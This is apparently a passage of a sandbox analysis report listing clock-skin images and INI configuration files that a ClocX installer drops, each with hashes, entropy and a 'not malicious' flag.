Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24933
Entropy (8bit):	7.90650308950336
Encrypted:	false
SSDEEP:	768:NLPppFgWbMSDrW/a/e/mbWfMpB3MXKlKQ:NDLASDr+myiVMLQ
MD5:	03B13207E96453A1724E2C86844D6F03
SHA1:	60EBE3929D936A6DF44E80AE9DB5E061CA41D555
SHA-256:	73DAFE6E6FE8C0CA6F689A899CD704AE26B7D35F494A7FDCAB895C774AFAF17B
SHA-512:	809910F6371D592821CA10F186CBC91F6F3855B36A03EFFEAB15F721F292AFC86674C2597741839C0AB704D6FC96049520463D4C0B90F3B8EF24C9D91C2E39DE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..`.IDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....e4....R~.....@,..2@,..b@,..@.......9.....7..g`...H....@..._..3 ~....>..=.l...&......z`..V.H.....k.....V..D2....w.27..5 .......hl`...4..Q..&..&I3 m..F.0b. ..GP..4.y.H..&......4..00...+.=.i..6..@ ..U.\R..e?..#@\|..;.L.Fr....L..D.l.0...........J...&aFr.'.eX...E....@....\|c..%@.r...A ..#.qE.X1ZXy..`(<..........'.\|........%....J..j.[.V.....t..:...q0. ...B.PPQ.`&.....]...p.........~.[.....U.....YZ .d......!...._..ls.L..}2.O..h.'``..5........&XF...J.l.l...".Rr...@Z\Z.ARV..O......@.....D..P........D.....././..bx....go..<x..f...'41.GM....F o#.^.L...s....M...+..B..*.H;.K...L.L.L.R..ALR.AAU.A^E..A............J\|..3FF..@..........S..w.0......7........%.}@.. .......x...a........"....H...M..h.....8%e..T...T....Td

C:\Program Files (x86)\ClocX\Presets\VioletteKugler.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	4.906092571887757
Encrypted:	false
SSDEEP:	24:BE0rGXE5lr9BP5MoaKLuaPTO2u1DHkp8wdGj8xi85sjibtYQTd9iBY2jabOtWuc:BTqylRMofiiNdGjWCUtjTTiBY2Gb+Tc
MD5:	6299257E666FF7E94C35E5C06CF2C369
SHA1:	283C54F59495A84734889776ED6F47ED5AB6A98E
SHA-256:	DBE467C95B421C4E0B99BF65A99FEDA9DD8C86687FF10889D3C1DFA6DBEF3E3B
SHA-512:	942802E9022565303ED072DDE09CDC564870DF7FADCEA4156DF47ABA9F38D99E5E73972BEC64CFC68427B492862BBB5CADE78F41D80274DFAC0C684AFE708113
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFF00FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=14 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=122......DisableDate=0..DateColor=0x00FF00..DateFont=Arial..DateFontSize=30..DateCenterX=1000..DateCenterY=25......HourColor=0x0000FF ;color of hour hand..HourLength=160 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=10 ;width of hour hand....MinuteColor=0x0000FF ;color of minute hand..MinuteLength=210 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=10 ;width of minute hand....SecondColor=0x00FF00 ;color of second hand..SecondLength=250 ;length of second hand..SecondLap=10 ;ove

C:\Program Files (x86)\ClocX\Presets\VioletteKugler.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 1600 x 900, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	18058
Entropy (8bit):	7.755795810552902
Encrypted:	false
SSDEEP:	384:uysVnL98NSU2tOrwmR154tM8Bc88TqnlJpd:uySXUaO9R4fBc86qhd
MD5:	579BD68B443B5AE75F83B7E55DCB66C1
SHA1:	447CEAAFECA2F9C59C5C5FE9E15EC1EFABDD173D
SHA-256:	5F8639EC82C166074EC913ED4B953C9CC91363B597A2A103CFDE56B4E4ED3FBB
SHA-512:	48872345D9FC0B9DBBCA498DC0C0BF8E5CBEF6D08F046EDEEDAC91C24416AAFFBDC43E113196B7A41F25D5552CC198B3F1CF5FED5771CB478C9CE39FEA4403D5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...@................tIME......:.t.O....pHYs.........B.4.....PLTE).=,.B..E0.G3.L4.N6.P7.R8.S:.W<.Z>.\?.^@.`B.cD.eE.gF.hG.jH.lJ.nL.qM.sN.uO.vP.xR.zS.\|T.}U..V..X..Y..Z..[..\..^..`..a..b..c..d..f..h..i..j..k..l..n..o..p..q..r..t..u..v..w..x..z..\|..}..~................................. . . . .."..$..&..).+.-...0.2.4.9.;.<.>.B.C.E.G.H.J.L.P.S.U.W.X.Z.\.^.a.c.e.f.h.h.j.l.m.o.q.q.s.v.t.v.x..z..{..}...................................................................................................................................................................................................................................................................................................................................k......tRNS...........................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\Wall Clock medium-sec.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 72 x 14, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	323
Entropy (8bit):	6.973816325694284
Encrypted:	false
SSDEEP:	6:6v/lhP++2xlv3zF1QOOtWbUgdyNxhnYpXLxDaRPYXuoBUSvux2nrkFp:6v/72rzF1wtWb9cxx0VGYXuoBUGlnwr
MD5:	B5ACF30D1585FAB9DA09CDA5D6A4FEE2
SHA1:	98FA6BFA72F2C9241AABB36EF6E36F5B9723E666
SHA-256:	616E149F162DBDEAE89BC3FEB6271BCB5300FAE10000F55DC56B0E399B60A055
SHA-512:	A74BF2DD5B37F76111AF6DE4AD754CBE04441DCEEDC8472510F89EC8997C9C7EA19C3C86226EC5E3C868384DA0396FCBFD687430441D4792159509BD12CDFC20
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...H...........Z6....pHYs..........o.d....IDATx..]..0.E......Ud......Q?2Z..A.Co"....4.!....X...=JHR.lD.!..KA...!.!+.[R......+.M...QU..)%y..\|g....A.y..4...Gr..9B..l.W..{fo.JA.k7.O....wK.n...../.PM.....4...-.9.....b....?+...<0.L.[.Z.%3.H.q\%.Q.......4...w/....3s..8....O..........n.....IEND.B`.

C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 158 x 157 x 24, image size 74732, resolution 3780 x 3780 px/m, cbSize 74786, bits offset 54
Category:	dropped
Size (bytes):	74786
Entropy (8bit):	6.085881051700042
Encrypted:	false
SSDEEP:	768:hHhvyP75gct7nK+cQ/d7yJZFDU+nfVOjKx2mW6ENRObp+A6iAk9x1:phKP7ndKcd7u/tOjKx2hNcAH+9x1
MD5:	A87FB416D0D925EC81816E43B4E6205D
SHA1:	7355F2E82AA5D9B11C706C4275F86986C26A421F
SHA-256:	8C923EEC22B59E971EF0D1A0FFF6C8F2D7B42C8577BE7430CF3E1E4F0024F3B7
SHA-512:	DB905387E6F802486AC225F7762E4F8F21FF78756D27B7C9B662771496B94EE0BB30CA1F7DAE3E38852B443639E3D08D17E091FC1442A874F5C3DA77B46F64A6
Malicious:	false
Reputation:	unknown
Preview:	BM"$......6...(....................#................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................@K@K2IV3HS2DK0@G/?E/>D-;A)4;%.4")0.%&.$%.$'.&*.%+.)...............................................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1493
Entropy (8bit):	4.861749071075584
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrx7Bxi3aKSmgTONMI10XDkpfoIG/w8b4ia33NPeibQ0Wd9iBxLJCb:BzqFlyfWI9KIGoQOtPBQJTiBxLG
MD5:	757BA281994BD6E525EA724A8B9E30DF
SHA1:	B3FEDAB89B7DC05765AF004177EC25E784715CF6
SHA-256:	191A3FCD80972FDCBE2D2C69C9FA0E3A414B25CA38F9239588F6923F25269B7E
SHA-512:	33195194B59F0C85135AFFB1A518813257CFCD78F4DCB6CC6AE7546EAF3402A53E935430BBE8699695AC7123F88883CAD423BD061B2F64CB09F7D37AD8AEE8A1
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x232323.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x232323..DateFont=Arial..DateFontSize=11....HourColor=0x000000 ;color of hour hand..HourLength=42 ;length of hour hand..HourLap=7 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x000000 ;color of minute hand..MinuteLength=57 ;length of minute hand..MinuteLap=7 ;overlap of minute hand..MinuteWidth=4 ;width of minute hand....SecondColor=0x553F99 ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=10 ;overlap of second hand..SecondWidth=1 ;width of second hand....

C:\Program Files (x86)\ClocX\Presets\White_Apple_Clock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 101 x 122 x 24, resolution 2834 x 2834 px/m, cbSize 37144, bits offset 54
Category:	dropped
Size (bytes):	37144
Entropy (8bit):	5.323192077358441
Encrypted:	false
SSDEEP:	192:3G+xNKrzZ4gb85tG/llgjmJahf7TyTWU8DgEdtN8xytFmnmU9OHGTV/zMmZilkL0:3JNK543hjTyTWU4gEdz8Icnf9PFs3D8e
MD5:	FBD9CA6CBBC07C9F7B16577E2BA8ABB0
SHA1:	4F9A98C739E9D209F77AD99396A8A4B77C0CFE69
SHA-256:	AB8D75A5B7230938E834DA4ECB043256DFE5466A30E59B2787BD08EAC14DE50B
SHA-512:	FE2371EB44023BEF023CB68E63AF745A3593E15FCC6DBC882090F62532E617C886924EB9AE04ABFC5C47785354217ED382E8DCCCBAFDBC6BF1DE11F0895BAFE8
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...e...z......................................................................................................................{{{sssooommmlllllllllpppuuu{{{.............................................................................................\|\|\|vvvsssqqqppppppsssxxx.......................................................................................................................................................yyysssmmmiiifffdddccccccdddeeedddeeejjjpppyyy........................................................................\|\|\|tttooommmjjjkkkhhhffffffgggfffdddhhhnnnxxx........................................................................................................................................\|\|\|sssqqqvvv..................\|\|\|uuuoooddd```bbbcccjjjrrrzzz......................................................\|\|\|tttppplllhhhkkkpppssszzzzzzyyyyyyzzztttkkk```bbbfffooo}}}.........................................................................................

C:\Program Files (x86)\ClocX\Presets\White_Apple_Clock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12531
Entropy (8bit):	7.8267819411607915
Encrypted:	false
SSDEEP:	192:WSb0V3Zxh1e7NN+aOZbEOMqy7wF6wYpk58VxjbqFS1VqmxVQLSopM7C2HUv5oxzR:5AVzferOZbbpUC15KoSPxgM7CMW5oDO4
MD5:	18B08FAD1BD9BD1098FC3772888D36F2
SHA1:	B7A44F8BE157ED798B1A1B9CB2D56E5761A2B481
SHA-256:	72E437C91CDCA423FCC9F7AFC91DFBA616157BC2AB344590BAAE62B75089F19A
SHA-512:	3B520D891E037507FDE5EAC7D53CEDCFB0404377987B065901681DA2630EAD9E6E54E115A4D042A7D95EF3E789C1A84AE29F72A2A77D25E84932DACA75053F01
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..0iIDATx....Fp....3e...).gsJI.\.{9.k1.....+.b`.).y.....gy..O=.u]x..8...<a..$I.,.(.}...,.Q..4M.a.<.m.<.CY.H....C.E.4..e!.....8.w....N.eY.......0.+..5M...X..m.b...B0..CQ.TU.UU..1\..l....p.Gt].....'uQ..o....@,...$.J.....%.. ...0.....R..... 9..n`....mh8....`..@..&...(r.%.0.Tr......L......}c..._.~..cgg..L .......@...........@..U;@....f, .),,......">\|....h./#...1.....l@..Z...L~.....@\q/......3......j... ..v.....X.(........?.-....h...bfee5.6..edd.E;....G<(.A.......p...T...~. .i.>....@...O....$99..`.......r...xNNN....p".......7o>.z)@...~..................r"77.D`.!G>.=..hP..".....p..Zr.}...;`"...\@...n...4.....4.....FQ....A..``..e..tl.W....:..^........_^.x..........+..@C>.....g.q..CKK....N.9..(........r....X.."...@.......4P.......\|.....w.@#.?R...l.@....%.(.@..j...i..`.NX^^>OLLL...C..a....$.+u`.........X........ .....H...E.h...Q.v.@.6(.>~....M2

C:\Program Files (x86)\ClocX\Presets\WidestoneStudios.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	982
Entropy (8bit):	4.7035599187649675
Encrypted:	false
SSDEEP:	12:a4EqmYvrrijpJTpb27XFPVGRXFdnXFPVJ99XFPhNhXFqA2kBIok9Gst81M2qYKcy:BEErI1MTwFBP1rfEk5CGm8Z5kNOi
MD5:	0B235DC651E778ACE561CE903E1BCBAE
SHA1:	56AAD578090CBC90B8F760019FC0339175988E21
SHA-256:	AA2D6050B1B0211D43AD6BC919E239B42C9A361FCFC07995F470F3FF3557DD75
SHA-512:	8047B11BA23C3DF7B31C316BBAD5EACAD11972B6C61AADE18C1CE31F2BD553C567066B5823827064E378C7D0F9AB18A5801305CFA84920C80256713D7C288BA0
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xC5BE47.;0000FF ;cut window by this color (default red)..ShowAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0xAA5F55.;color of AM/PM indicator....HourColor=0xC5BE47.;AA5F55 ;color of hour hand..HourLenght=33 ;length of hour hand..HourLap=5 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xC5BE47.;AA5F55 ;color of minute hand..MinuteLenght=47 ;length of minute hand..MinuteLap=5 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xC5BE47.;E8F08E ;color of second hand..SecondLenght=54 ;length of second hand..SecondLap=10 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=80 ;center point's X (default image_width / 2)..CenterY=52 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\WidestoneStudios.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 144 x 104, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13391
Entropy (8bit):	7.865143077553108
Encrypted:	false
SSDEEP:	192:/SD4RQg9vDQfUzRKk44poiF6QoqHK8fdhP1eUBuvuHyQT1BFni6XNPH/xGkvjm:qDN2vWk44GdQoshNeUsxgDni8PHZGAjm
MD5:	EBFFA2AD6F19E5418BB2F65E3B4CF5D4
SHA1:	87C70FBB8C6A0F4C83D67320931D23C4A498197E
SHA-256:	DC92936E7F1B197A209BED51B50C2C274564E22EBDB6889880B58D11DF993834
SHA-512:	1403E27E73AC6420AEB9B9218679A7378585BE165C94A0AAC0EE791B7128D9396F57F441FCB18EB243A5ED9923184B2C5FFA296AF4C90A3E8551143EB94FEFEE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......h.......y.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..3.IDATx.bd```b.....A..d..@.0.F.....#........4..F... .......K..-..9.. fh.S..!...)!!'8..f .&....?..@..Z.1...N.....M<.....#.."..].!'$h..O..Q04.@.....MP.%.0......c.bB.L..#%%.(......O.a$!a...N.G.!..dd.....8..@.d.8."...A..........q..IID..$..8..NX..DN.b.c..5$.^.2b..D....<.....JT...2H.5..D.&.&.'1...p..H...X..?.m.a......v.-K.\..=.0#.aKL..JBBB...........C....?h..H...(f..}....eff.....x...GH...M...V.. ..)..O%..K.....3....p}<<<.lll...L,`.L..@...H...GND06:..@......w......N.<y...+q..D..@..l/z.a.H..`&`..ecgwfae5......<.@..z..%.l.\.A......3.G..2.K2.e...~~.c...=...\|.r.....q$(..pH.R...8..1..6..........Y&ffG`d....0.@..R"..h..=.....^duO.=b...#........4...P.*...J.?..\.r..a,............8@..r.AO4.H...M.......5..(la..J(...K(XJ.h...J. ........^@....`.c......bd...G.o_...q..2....j..L...7..1...A.............M... ......$.V$..cs...2..&.cD.........aDm. .......fx........x.

C:\Program Files (x86)\ClocX\Presets\Wonderglobe2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 95 x 95, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	20649
Entropy (8bit):	7.9768824867321575
Encrypted:	false
SSDEEP:	384:USxy+3/jChO3XBcz2dlqj4SH1kp+6tqmBbBrf0EunL3a2OtT89UvEPa4DRnlO8za:vx//jJ3Xazmg4SVbgzBran7J8TFj4DtY
MD5:	6C8F406A6AA5DBFC6DD07E10842867DB
SHA1:	B2E7FA8AAE533ED129F3A5BA1733A89A5CA42105
SHA-256:	5C2FAA546C5860E69F39C7BCF97D67F473F3301EE19460B9769934A946FEF390
SHA-512:	E0C98580FE0F8520E617CA1D539537C46E7E34DAA52F2FC987AB484BB97038739F16B7C53C5A519F74B9EF887E3E23E23B563170CDB5AB5679925D1F61E1D3DA
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..._..._......L......bKGD..............pHYs............... .IDATx..Yl..y.7.m..H..H..A[.(.R.-.....KR....(Q.B..G.D...j!%J..S..K.(...Fc..<....@..5..I...8.......C..u.6N...o..s.w.....S...B<+.x.......B./\|....+....f...3..\|A...B..R......#...!D.R..I)....B...U.P4I).^..%!...]....h..H)..R~YJ.!.<.B..B.B~KJ.m).B...w...{...B.y(.....R.z(.....{B.w....B\\.vm_.1(..S!...j~Z......Y!...R.Z.~.V..U(K~.,)..........`z..;.hpd.jl.z59kg..d..dj......Y.G&0.....sU......gJu.{R.....o.!"B..!....#.\|..I..J)..$......!..Rq)..Ju.{.5..6.LW.#....Y^.`c../..."....G.....!v.A.. ;;~.};lnn...eu..k..s...9..G.u~XV].cEI.B(.#.\|I.P...%.x.W.._.B...rJ.w.%e.R^....g.j...g.`(Blw..~.L&K..#...dI.3.Ri..u.63..u..0.H.X,F4.%....~D.o...eu...."3.........k..W...@.T.R.U(.eR...4.......3B.J+.o.........H,N2.....B.@.X.X<...B.@.P.. ......+....!"...H.H$B4.%....DX\Zd}.M..'........dm.....6....):...kl.@SZ.#.B..!....q.?..`EOK).PUs..6w.}0mw].....,..!.l.\.G.P......rvv..78:*...#......q/.......m.p....\|

C:\Program Files (x86)\ClocX\Presets\alarme.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1475
Entropy (8bit):	4.853612525961072
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9BxoaKy4rTORXFB01rfDkpWdGm8diF0PfXvibQ0Wd9iBxLuQI:BzqFluf1QFKOMdGmUPfwQJTiBxLvI
MD5:	D821262416FC40D087348659DEC1C6E4
SHA1:	05E9FD31BA6667274CC8B94466446AE492D41A3C
SHA-256:	FEBEBCCFF26778BA1204CB6D58A7E889D44ADBED33BC0FEFAA3E32CEF632FE3B
SHA-512:	278482031BE63DA8B81FA5529ACB5E3735E2ADAF6E5CA3D3398E838BAF80EA04FAC7747C1848FDE578958A50A05F0B1C7487815FF7D4F4F7C65EEBC1EBEABD03
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0x000000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x000000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x000000 ;color of second hand..SecondLength=55 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... C

C:\Program Files (x86)\ClocX\Presets\alarme.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 218 x 273, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	96516
Entropy (8bit):	7.919324419762643
Encrypted:	false
SSDEEP:	1536:OrUAxUUOq+08PZwDmJr9EfkFF8mYIDMvGZKfCg+kRTdIeKr86G0Ktu3O2UQ2s:P4wZwDsr9Efkv1xwGIfj+kR0r8LJQZ
MD5:	1138A4BE4BB0FA2728E3D6DFE1C6B2E4
SHA1:	1001A4D64D36486FAD7E5ACDDD4F458829FC435D
SHA-256:	7DA15B7C64292B1FE73983085A174669892A93D3CF344A613EBEE8C33687898A
SHA-512:	1251CF147BB1FCFF466F4C2C2A78F8DAD1275BA3B2DA5E9BB7543E10B10A07E7E8361416C1A1BDE4B7A03281E6904766F0D7A0EC99DF1BA8708D2818D7C722E6
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............jB......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o......x.IDATx.b...?..0222..w.?...:.#..;'k._LLL..jB.......f):8}.2..w..k7o..:c..555.QQQ.II..@_..... 9...r.......@8-.Z.k...[.L. ...0 6.b1 .b..Ej.....\|....6.bf\....N._.z...1..E............dF.1.65.....c'O.....d.6...c...8....b5l.......%= z..5/..B..o.b...............w_...)A)..&.....x.....Y...?...?o......#......Pi.d.....R..l.-=.Aq....?-3..Xd..k'..7.>..S .1.......W6X?(.>}...PZ..->......@...O........>2\|..........ATJ........>f`...a..6@-_......d....../....O?.... /+.....@.]0...........i..&..........0..sf.g....Y.\|E..H...X3...._.......H....c...c.z..$VVVP.Y..@`.F....ax{u.........4;7'...s:....}..... -.. ....'..E....^...q..)._...p.2..0f.....}..Td...v...k.....P...'..{......`"...@Y.K@N.AO_{..2..F...J.......+...J...B..GO...y.6.<......./...3.c@........J,...S......d...@..xJCC.....n....{.8\|.6..of.iQ>./.Y.2.=y....a..]M......;MH..........J&@<. .X..6(5}...(...[`.-.).6k.C...[v]b.v.

C:\Program Files (x86)\ClocX\Presets\apple.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1472
Entropy (8bit):	4.872769610377242
Encrypted:	false
SSDEEP:	24:BE8rGXz5lr9BxoaKy4YPTOI01rfwPkpGdGm8bCi1iYdeibQ0Wd9iBxLuQI:BTqFluf19j4dGmQDiYdBQJTiBxLvI
MD5:	38F4322D84E0E6A5BD58BBE888061AC7
SHA1:	4DB5C23A6298D62914714E7B92E11EF4CB41AC35
SHA-256:	FFE096724F22FDD9CFB9C9622CE51F965648D9EE7C2C5537B39F5C1313A6391F
SHA-512:	1F9278D5A21F71680E024B195D02E9E14D229712C0CA88719FDAA5BF03861B70DD65E12CCEA4E46455B31673F8C6B9F6A9BC6100CB4C9728A7039FDC713FBF2F
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x000000 ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0x9A4F45 ;color of hour hand..HourLength=25 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x9A4F45 ;color of minute hand..MinuteLength=42 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=44 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....Ce

C:\Program Files (x86)\ClocX\Presets\aqua-clock1.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 107 x 114 x 24, resolution 2834 x 2834 px/m, cbSize 36992, bits offset 54
Category:	dropped
Size (bytes):	36992
Entropy (8bit):	5.610490122908846
Encrypted:	false
SSDEEP:	192:CBccMWRLppppppW111111MhOCZX0/oYkjkX/dOMQz6ruH2qraRsEtNRY0ZE7DFF8:CBvcQX0/lOvf8BNvw1lKXlJ
MD5:	56F18FD2EC130B2714C9BFEEF92ED37A
SHA1:	0BFCBBC051BA9323D9A8B5F0D7DDF77C75A21985
SHA-256:	9E5A84DA02E5BB837B575B899F4FF55F5A0095C412C4433A2CFC922208CAFA66
SHA-512:	897F923C68A601667A7AE09F1802F41F6F0E663D74F80887A8EB4ACE9AE1942DF26C368BDD0814285170B7A5B940E9A3774AAA7D90DFF426A5016260DB445BDA
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...k...r..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................xh.\|g..m..j..l..q..t..s..t..t..t..t..t..u..t..t..t..t..t..t..t..t..u..u..u..u..u..u..u..u..u..t..u..q..k..b.w_.lZvja.............................................................

C:\Program Files (x86)\ClocX\Presets\aqua-clock2.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 112 x 113 x 24, resolution 2834 x 2834 px/m, cbSize 38024, bits offset 54
Category:	dropped
Size (bytes):	38024
Entropy (8bit):	3.804159517586175
Encrypted:	false
SSDEEP:	96:mEPBcUiVCRGqKcOnrmGDVNdKh9B+QRGB9Ov7OPcmn:mEP00xRGhQG
MD5:	FAD209473000F30FB8AC132E5ADDBB94
SHA1:	5886423659F1DE4D705BA68583C3B36D9A3857F4
SHA-256:	8F8E24924515FF1CC157405FD35A2DFA60E49558A4E11CAE4406D88C75202BD5
SHA-512:	78DF2A704FDF25EE45621005349CF2893E14A9BC909404606CCE44126FCBE1D4EF6B2C70951B18049D3AFD8526E12A5BBDB25B44EB4E80EA90438CE1E352536B
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...p...q.................................q..q..w..o..m..l..q..q..q..q..q..r..r..q..q..p..p..p..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..q..q..q..q..q..q..q..q..q..q..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..q..k.zd..q..q..q..q..q..q.............................................................................................................................................................................................................................q..q.....................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\aquamade.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	949
Entropy (8bit):	4.571347043037757
Encrypted:	false
SSDEEP:	24:BEQrIADTORXFB01rfjkpWdGm8xiF0ZJGi:BzCFKuMdGmEZJp
MD5:	96FD9CCA4BBB46E48F65EC26E3AA1F3D
SHA1:	AEA8888332BF8635A1FFDBEAED9E8A632A21423C
SHA-256:	D56E5151C7EB06AD35A0364BAA8D95DDB11700754889C5498DFA6AF2CA945888
SHA-512:	F4C10EB0AFDC7E54B8DBE0C02ED2C6C22A9B6912A683536796B1FBFF0BA1BF19DCA969375002C13331666A0266DD42E38BAB628D047AF4B1C1A490786E0C3B47
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red)..ShowAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0x00000000.;color of AM/PM indicator....HourColor=0x00000000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x00000000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x000000FF ;color of second hand..SecondLength=55 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=63 ;center point's X (default image_width / 2)..CenterY=61 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\bahnhofsuhr.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1540
Entropy (8bit):	4.909224216363058
Encrypted:	false
SSDEEP:	24:BE8rGXE5lr9BxjTJaKhVY/qTORXFB01rfwkpWdGm8bCi51PgibQ0Wd9iBxLuQI:BTqyllTJfgLFK3MdGmQ71PXQJTiBxLvI
